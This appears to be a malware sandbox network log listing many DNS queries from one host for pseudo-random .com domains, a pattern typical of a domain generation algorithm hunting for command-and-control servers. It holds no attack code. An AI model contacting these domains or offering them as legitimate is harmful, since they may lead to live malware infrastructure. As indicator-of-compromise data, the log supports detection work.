                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.233031988 CET192.168.2.61.1.1.10x6519Standard query (0)gacynuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.233299971 CET192.168.2.61.1.1.10x8cd6Standard query (0)lygysij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.233489037 CET192.168.2.61.1.1.10x3376Standard query (0)lygyvar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.234206915 CET192.168.2.61.1.1.10x8d47Standard query (0)volygyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.234489918 CET192.168.2.61.1.1.10x8c4bStandard query (0)pumywaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.234659910 CET192.168.2.61.1.1.10x6d01Standard query (0)lysyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.234931946 CET192.168.2.61.1.1.10xd530Standard query (0)gahydoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.235079050 CET192.168.2.61.1.1.10x2a91Standard query (0)galyfyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.235327959 CET192.168.2.61.1.1.10xc599Standard query (0)ganyqow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.235763073 CET192.168.2.61.1.1.10xe1a2Standard query (0)pupyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.236223936 CET192.168.2.61.1.1.10x1b0Standard query (0)pumylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.236265898 CET192.168.2.61.1.1.10x5825Standard query (0)vopypif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.236494064 CET192.168.2.61.1.1.10xf26bStandard query (0)lysysod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.236588001 CET192.168.2.61.1.1.10x9f7fStandard query (0)qebykap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.236764908 CET192.168.2.61.1.1.10xea99Standard query (0)vonyket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.236876011 CET192.168.2.61.1.1.10x7fc5Standard query (0)qekynuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.237044096 CET192.168.2.61.1.1.10xb49bStandard query (0)lyvyjox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.237140894 CET192.168.2.61.1.1.10x867Standard query (0)pupypiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.237397909 CET192.168.2.61.1.1.10x9eecStandard query (0)ganykaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.251729965 CET192.168.2.61.1.1.10xe99bStandard query (0)puvyjop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.251810074 CET192.168.2.61.1.1.10x1e26Standard query (0)pujybyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.252093077 CET192.168.2.61.1.1.10xee97Standard query (0)lykynyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.252381086 CET192.168.2.61.1.1.10x4117Standard query (0)qebyqil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.252417088 CET192.168.2.61.1.1.10xe36fStandard query (0)qetytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.252752066 CET192.168.2.61.1.1.10x2d46Standard query (0)lymywaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.260767937 CET192.168.2.61.1.1.10xd054Standard query (0)lyrytun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.261311054 CET192.168.2.61.1.1.10x8c16Standard query (0)gatypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.261496067 CET192.168.2.61.1.1.10xb0ddStandard query (0)gacyhis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.268475056 CET192.168.2.61.1.1.10x133bStandard query (0)purytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.268645048 CET192.168.2.61.1.1.10x5be8Standard query (0)lyxygud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.268918991 CET192.168.2.61.1.1.10xe5f0Standard query (0)pufycol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.271554947 CET192.168.2.61.1.1.10x8706Standard query (0)vocyjic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.271820068 CET192.168.2.61.1.1.10x1aa1Standard query (0)gaqyreh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.272075891 CET192.168.2.61.1.1.10xcd99Standard query (0)vowyrym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.275367975 CET192.168.2.61.1.1.10xfa9eStandard query (0)qeqyreq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.276624918 CET192.168.2.61.1.1.10x3e29Standard query (0)puzyguv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.276885986 CET192.168.2.61.1.1.10x2b4fStandard query (0)qedysov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.295135021 CET192.168.2.61.1.1.10x4018Standard query (0)qedyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.787137985 CET192.168.2.61.1.1.10x5ceeStandard query (0)gahycib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.788686037 CET192.168.2.61.1.1.10x2a75Standard query (0)lyvyguj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.788836956 CET192.168.2.61.1.1.10x16cfStandard query (0)puvygyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.789309025 CET192.168.2.61.1.1.10x1986Standard query (0)qetyrap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.790327072 CET192.168.2.61.1.1.10x4734Standard query (0)vojycif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.791728020 CET192.168.2.61.1.1.10x475fStandard query (0)pujycov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.791728020 CET192.168.2.61.1.1.10x4f06Standard query (0)gatyrez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.792277098 CET192.168.2.61.1.1.10xa6d8Standard query (0)qeqykog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.792846918 CET192.168.2.61.1.1.10xfbc5Standard query (0)vofypuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.792846918 CET192.168.2.61.1.1.10x7166Standard query (0)puzybep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.793204069 CET192.168.2.61.1.1.10xaea7Standard query (0)gadypuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.793771982 CET192.168.2.61.1.1.10x8f9Standard query (0)vonyjim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.794197083 CET192.168.2.61.1.1.10x6086Standard query (0)lysytyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.794801950 CET192.168.2.61.1.1.10xc817Standard query (0)volybec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.795169115 CET192.168.2.61.1.1.10x3c74Standard query (0)lymyjon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.795607090 CET192.168.2.61.1.1.10xf46bStandard query (0)galyvas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.795789957 CET192.168.2.61.1.1.10x1fd7Standard query (0)purywop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.796120882 CET192.168.2.61.1.1.10x78feStandard query (0)pupytyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.796406031 CET192.168.2.61.1.1.10x34e7Standard query (0)qekyvav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.796690941 CET192.168.2.61.1.1.10x5369Standard query (0)gacyvah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.797195911 CET192.168.2.61.1.1.10xc694Standard query (0)lykyvod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.797195911 CET192.168.2.61.1.1.10x38e3Standard query (0)ganyhuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.797676086 CET192.168.2.61.1.1.10x55fbStandard query (0)qegyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.798096895 CET192.168.2.61.1.1.10xa7b5Standard query (0)vocygyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.798096895 CET192.168.2.61.1.1.10x505cStandard query (0)vopyret.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.798283100 CET192.168.2.61.1.1.10xba19Standard query (0)lyrywax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.798693895 CET192.168.2.61.1.1.10xfb1fStandard query (0)qebyhuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.798749924 CET192.168.2.61.1.1.10x2a1aStandard query (0)pumyjig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.799475908 CET192.168.2.61.1.1.10x7f8eStandard query (0)qedytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.800148010 CET192.168.2.61.1.1.10xe203Standard query (0)puryjil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.801450014 CET192.168.2.61.1.1.10xa39cStandard query (0)qegytyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.814568043 CET192.168.2.61.1.1.10x6947Standard query (0)vocybam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.814568043 CET192.168.2.61.1.1.10xf4adStandard query (0)gahypus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.814935923 CET192.168.2.61.1.1.10xa820Standard query (0)puvybeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.815021038 CET192.168.2.61.1.1.10x2ae9Standard query (0)qetykol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.819856882 CET192.168.2.61.1.1.10xd6a1Standard query (0)vopykak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.820996046 CET192.168.2.61.1.1.10xa070Standard query (0)lykysix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.827348948 CET192.168.2.61.1.1.10x68d3Standard query (0)ganynyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.831371069 CET192.168.2.61.1.1.10x4d3Standard query (0)pujypup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.838969946 CET192.168.2.61.1.1.10xc7f1Standard query (0)lyryjir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.864741087 CET192.168.2.61.1.1.10xd24fStandard query (0)lyvynen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.864975929 CET192.168.2.61.1.1.10x5ff9Standard query (0)gatykow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.869326115 CET192.168.2.61.1.1.10xe27eStandard query (0)vojypuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.869326115 CET192.168.2.61.1.1.10x44dStandard query (0)qebynyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.876512051 CET192.168.2.61.1.1.10x91bfStandard query (0)galydoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.876513004 CET192.168.2.61.1.1.10xc715Standard query (0)puzydal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.876725912 CET192.168.2.61.1.1.10xc38aStandard query (0)qedyleq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.876727104 CET192.168.2.61.1.1.10x8e67Standard query (0)vofyzym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.876889944 CET192.168.2.61.1.1.10xc9cStandard query (0)lymymud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.876889944 CET192.168.2.61.1.1.10x4404Standard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.877022028 CET192.168.2.61.1.1.10x801eStandard query (0)pufyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.877088070 CET192.168.2.61.1.1.10xf68bStandard query (0)qeqyqiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.877088070 CET192.168.2.61.1.1.10xb4f9Standard query (0)pupylaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.877976894 CET192.168.2.61.1.1.10x812aStandard query (0)pumymuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.877978086 CET192.168.2.61.1.1.10xbdd3Standard query (0)gadyzyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.878339052 CET192.168.2.61.1.1.10x5972Standard query (0)qekysip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.880273104 CET192.168.2.61.1.1.10xe916Standard query (0)lyxyfar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.881311893 CET192.168.2.61.1.1.10xf3ccStandard query (0)gacyfew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.916754961 CET192.168.2.61.1.1.10xf4c8Standard query (0)gaqyqis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.917346001 CET192.168.2.61.1.1.10x9021Standard query (0)vowyqoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.917346001 CET192.168.2.61.1.1.10x49baStandard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.917803049 CET192.168.2.61.1.1.10x9636Standard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.917803049 CET192.168.2.61.1.1.10xe4eeStandard query (0)lygyxun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.961081028 CET192.168.2.61.1.1.10x1d38Standard query (0)qexyfel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.071304083 CET192.168.2.61.1.1.10xb3baStandard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.084450006 CET192.168.2.61.1.1.10x7731Standard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.084577084 CET192.168.2.61.1.1.10x4a24Standard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.085345984 CET192.168.2.61.1.1.10xd80bStandard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.100730896 CET192.168.2.61.1.1.10x2c89Standard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.114089966 CET192.168.2.61.1.1.10xb186Standard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.115691900 CET192.168.2.61.1.1.10x6230Standard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.115968943 CET192.168.2.61.1.1.10x536eStandard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.119360924 CET192.168.2.61.1.1.10x11d8Standard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.120893955 CET192.168.2.61.1.1.10x3deeStandard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.123075962 CET192.168.2.61.1.1.10xdbe7Standard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.125169992 CET192.168.2.61.1.1.10x6caaStandard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.126507044 CET192.168.2.61.1.1.10x2f01Standard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.127955914 CET192.168.2.61.1.1.10xbc83Standard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.128983974 CET192.168.2.61.1.1.10x7a64Standard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.130000114 CET192.168.2.61.1.1.10x8ac9Standard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.137979031 CET192.168.2.61.1.1.10xd50eStandard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.147861958 CET192.168.2.61.1.1.10x18c4Standard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.162856102 CET192.168.2.61.1.1.10x9914Standard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.162988901 CET192.168.2.61.1.1.10x121bStandard query (0)vonygec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.164395094 CET192.168.2.61.1.1.10xa6b1Standard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.167392969 CET192.168.2.61.1.1.10xe28Standard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.168451071 CET192.168.2.61.1.1.10x7fc8Standard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.178723097 CET192.168.2.61.1.1.10x4e59Standard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.178896904 CET192.168.2.61.1.1.10x980fStandard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.188241005 CET192.168.2.61.1.1.10xa740Standard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.188728094 CET192.168.2.61.1.1.10x9b98Standard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.189227104 CET192.168.2.61.1.1.10xa01eStandard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.190125942 CET192.168.2.61.1.1.10xeb8eStandard query (0)ganyfes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.190788984 CET192.168.2.61.1.1.10x3a38Standard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.190943956 CET192.168.2.61.1.1.10x1463Standard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.191096067 CET192.168.2.61.1.1.10x5fedStandard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.199098110 CET192.168.2.61.1.1.10x55b9Standard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.202320099 CET192.168.2.61.1.1.10x9fdStandard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.202553034 CET192.168.2.61.1.1.10xdf4bStandard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.202706099 CET192.168.2.61.1.1.10x193fStandard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.202868938 CET192.168.2.61.1.1.10xdbeaStandard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.203031063 CET192.168.2.61.1.1.10x9d4fStandard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.203233957 CET192.168.2.61.1.1.10xa959Standard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.207597017 CET192.168.2.61.1.1.10xfcbcStandard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.209248066 CET192.168.2.61.1.1.10xd69bStandard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.209600925 CET192.168.2.61.1.1.10x96fdStandard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.209758043 CET192.168.2.61.1.1.10xf174Standard query (0)pupywog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.210094929 CET192.168.2.61.1.1.10xc8d0Standard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.211731911 CET192.168.2.61.1.1.10xca4dStandard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.211895943 CET192.168.2.61.1.1.10xfe4fStandard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.216758013 CET192.168.2.61.1.1.10xb8ffStandard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.218492031 CET192.168.2.61.1.1.10x4f1eStandard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.219923973 CET192.168.2.61.1.1.10x1686Standard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.221342087 CET192.168.2.61.1.1.10x9ed0Standard query (0)gaqyhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.222589970 CET192.168.2.61.1.1.10x3816Standard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.222776890 CET192.168.2.61.1.1.10x4f24Standard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.222986937 CET192.168.2.61.1.1.10xdd68Standard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.223011017 CET192.168.2.61.1.1.10xfc5eStandard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.223531961 CET192.168.2.61.1.1.10xe9a0Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.223581076 CET192.168.2.61.1.1.10x3b30Standard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.229156017 CET192.168.2.61.1.1.10xe47cStandard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.230017900 CET192.168.2.61.1.1.10x27cdStandard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.230739117 CET192.168.2.61.1.1.10x8810Standard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.230739117 CET192.168.2.61.1.1.10x99f7Standard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.231937885 CET192.168.2.61.1.1.10x6fdStandard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.232171059 CET192.168.2.61.1.1.10xdd5fStandard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.002726078 CET192.168.2.61.1.1.10x9965Standard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.002727032 CET192.168.2.61.1.1.10x72e3Standard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.009799957 CET192.168.2.61.1.1.10xb9c9Standard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.011269093 CET192.168.2.61.1.1.10xc39fStandard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.030677080 CET192.168.2.61.1.1.10x30d9Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.031539917 CET192.168.2.61.1.1.10x5c99Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.053702116 CET192.168.2.61.1.1.10xf24dStandard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.057145119 CET192.168.2.61.1.1.10x7a4fStandard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.095326900 CET192.168.2.61.1.1.10xdc74Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.101248980 CET192.168.2.61.1.1.10x883eStandard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.112459898 CET192.168.2.61.1.1.10xc4fStandard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.114927053 CET192.168.2.61.1.1.10x4a7aStandard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.131351948 CET192.168.2.61.1.1.10x1899Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.136408091 CET192.168.2.61.1.1.10x7b5Standard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.137840986 CET192.168.2.61.1.1.10xea18Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.140834093 CET192.168.2.61.1.1.10x60e6Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.143655062 CET192.168.2.61.1.1.10x3bffStandard query (0)qekyqop.comA (IP address)IN (0x0001)false
